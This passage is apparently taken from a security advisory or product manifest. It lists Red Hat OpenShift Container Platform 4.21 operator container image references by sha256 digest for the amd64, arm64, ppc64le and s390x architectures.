"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d4b99966cb1cdf067d73eab6074f42203f65c0a10c78ef3b16f7deae78e21b94_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9cb8a702b78977cc3a6e5418210d15a0d431fa56c217cfd8b5f69653d6acb89d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a5f93ba58c76c1d26d44bbe14a70d4cfb07e7edd9401bee47da3ce2abc435bc1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:ba11e45b58a6c4940f40f11c0d47129571103de5883d4ccf22b6ba5b9ccdb9b4_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:fc95a3a095e63ec33e95a638dae9f529583c054cbdc3dacf1b90d1e10f35bea3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:299f374419ceec56c49dc130fc4052bb7140be28f23b6f5b414607bc8ad4a805_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:414f0b86c4940ad7a5ca443bf04ff8293f93804d8b69688382e177afa1459394_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b96362fcb7b09af38eed2bd77d8720fe128a4c677d3a5d46dbe3b09412fd1fd5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:e207c502258c60ca9fbe42ecaf9ab005dd7ba3d9b76566b6a92756fc73b6968e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:1a22a625e67c26e4db67b97a3e08fe63a1ed931e419b732fb186567ab5c2edd7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:42396c0e20ce9c8afbfb8c87b80e1b48b0695118a583b1e107f07bae9ead7614_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:46afc0e9d2c34fbcb000ed2ac59c393aa4160944bf083b4b4ef7f09a73c77023_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:903ed233bcf6493cca231fe024bda6085f9dda1052783e5f8daa8d5c35b6652f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:b3747aca163af2713256a975222f6dac10692a5b99ef948bb8e4471532e4e484_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cb27bf3938c353f8ed8138c5c650be7e72ee2e9d6b14e998eaa2e39db18fe3ed_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:fef2fda5b7fde7cae7b32d63507fe61ffcc74632e7c5170146f9afa5d827a359_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:ff132632ffb2f87746e79787cac21fba12a9862a707885dbe9ccf95f2b388941_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:15399cbb6b6adc9ec25f1174ad8e04f5c5f5bf0b02d4ee7023b4f38e810aca03_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:51b7944a69371c67883a6decf075013feb4cea80258fc0927176fa824c98cf2f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b24d5a179400093a2a61b87f3c0dbd8d1f1f91e8fcb288e18f87ef5fe8bd6a4c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:e8aa91667479746a74f25506fcdaa4b639b947d73a77af49f2b945f93e2fdb46_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:1782aa4b09b78512885d81c529588737d738cf29def3ff2542e74fd02d256cf2_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:66e02bf9c48cac8edb441d20fc8bcf3f57af58d13b9bc65e7337592e466592c3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:c9f28ea22ec8ebfecd5af2d0369ed023b6f9d4e3413e3ad6048aeebb124ede5f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:ccd9f2be0df364b640b1e2b8b470bb9a536222383734258e4917bcc0adddec38_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:03747941ed41fbe46a4eea27ccedfde73d5cb56d7da3e6bd58c0591800014e3c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:725ba6da6b823755b419f3fa21abd83b3b8bfbda87a0ebe95cd1154afdd5edca_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:b6d1aa1c4d291f0e581185ac425a900961f2a01b73481f004607e0918af0aaad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:bfc8fbbd5e342e4e801d576913b0a6a9c41150c0a091eb43d0886a18f3a22f17_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:63f0b1ba5c3947e640911e31b9032bce1b7e3cffd16574158a67a9d8bfbb52d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9a0291c1d482cc75b5da3b61ea6cb240bae63c7f7bae7ca5d6ef9cdd30233432_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:d8fcb99e70b38b22fe131df90326e000e0cda91f206468ad06d4e8ebecc323a0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e44e5b2f803f9c0e0003b5832fbb90a80c9e35a36ff524cfbe04b00d18dd9aad_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:0628f21ae749dad21df82d4375448da03b3556d8cfa3411a91d7693ee050635f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:33b125caf8101d10e87c75d960666659dc64ecb8c9cc15c39049f82b174a2b03_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3be19f58c31be0655db45e701bd9852a07ae1fda287301fa8218f2ef56c2ee55_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:99153879eb97320f2d86b6af296540250f7e234f847a01bc3d0ab50e509918a9_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:0e4945c40c683253f210a354ab1b52cfaae5fb3c844b47f391c1cdaa9fe170a0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:16ebabf0329c1fa4104b3f3d244c3b3e54ff6b7f747b092b66e3ef2b4d79216f_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:200cc383245287f696fd5c0c6bf63b2bfb96c4e27e8fa46f7938b49af2e40f94_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:5cf69f239d585f936caca1ea97ec5870e6fdfcfee2fdf83984d40e371fa31180_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:31946984af1316d14937792eb39335d8effa5774fc5c28200d770d48117ce492_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:b39be2a08e43aef9897cc7a3d411d9ad6b8037cfed852e916e57d0346ac7e675_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c82aa35aff9a2feda3598f7a1d84a7b7b78736af05dbeccdac3a5d2600d6cbb5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:fda1392b4de1ec066e6e816968c6a5af8fe4f33a9dd81216dcac8f34c5824010_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:2a75be0f5104de3c9b587e92dd8e266d7d54c278b8c15321b377ca6ad7636cf0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:33929a52af39ae582e1c19c4b3598b0b1d83669aed27faa42fdad73798d7b4bc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:70f1339b43a7a2ffa55e8128782dbf02308e74e7f3b71e93e498a8fc841bae68_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:ac058f6d264bc7ce4ae8ffdc63c30eff96ccb2ea8c3b896a761d4acfc41c685b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:67a5c7868876aa2532948aabd3169bad5b43d278fb72bbc3c7996166605a61a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:7df58145a95adeb913b9cbca82da8ae856a10b3de5ed25e170fd7af9c80afdd7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:841b26747f8ecaf1056d4737bd1c3f3646d6879ed8a01f28093325e4945c2a2b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:b26b53b427eedb66b64ee766ac8d8915a2e9b4c4d370684c8215fe44a5fe078a_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:0c6fbdff8409ec28cb25730648b32d08787a25e422273635ffcfc12df4adcef9_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:2fe70ff939d25ac7ef7809fe566015398423d236276a342dd48df66e690a775d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:84672d5c16e192f5b5919577cbef7098cc4d19be1af37d2a40dce1a162e7dce7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:b0ab000dbe5818bd25853a4917cf7eb8e4d56c228837747f42361fa3ba3e321e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:176d9b8a630e5614f993712266130175fa393b7fa4706a9e0d4e965343864b37_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:477d28c93d7405520951ab1c64f172b66ab4834462e21e8d8f7d1892adde954a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:63a534489c093862945a6215eca0dcae4f7e738414d8840a7962d4604d6dcdb3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:e8a14458a2580a5d8e9719e38fcfad7dcaea488533866d3c784d171383278985_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:0d9579b0b3b9cd657ae69826fefc91d37a609663940aa7d78f403dcb67db7649_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:46eddf2c3239c92218286368ced60b42cea6f789a09ab9981f0e6fbd216cb1f6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:6f5d819b8b433e84c4bb7c41a6a31f1265be15ccbb13a0605d0dc16d718904de_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
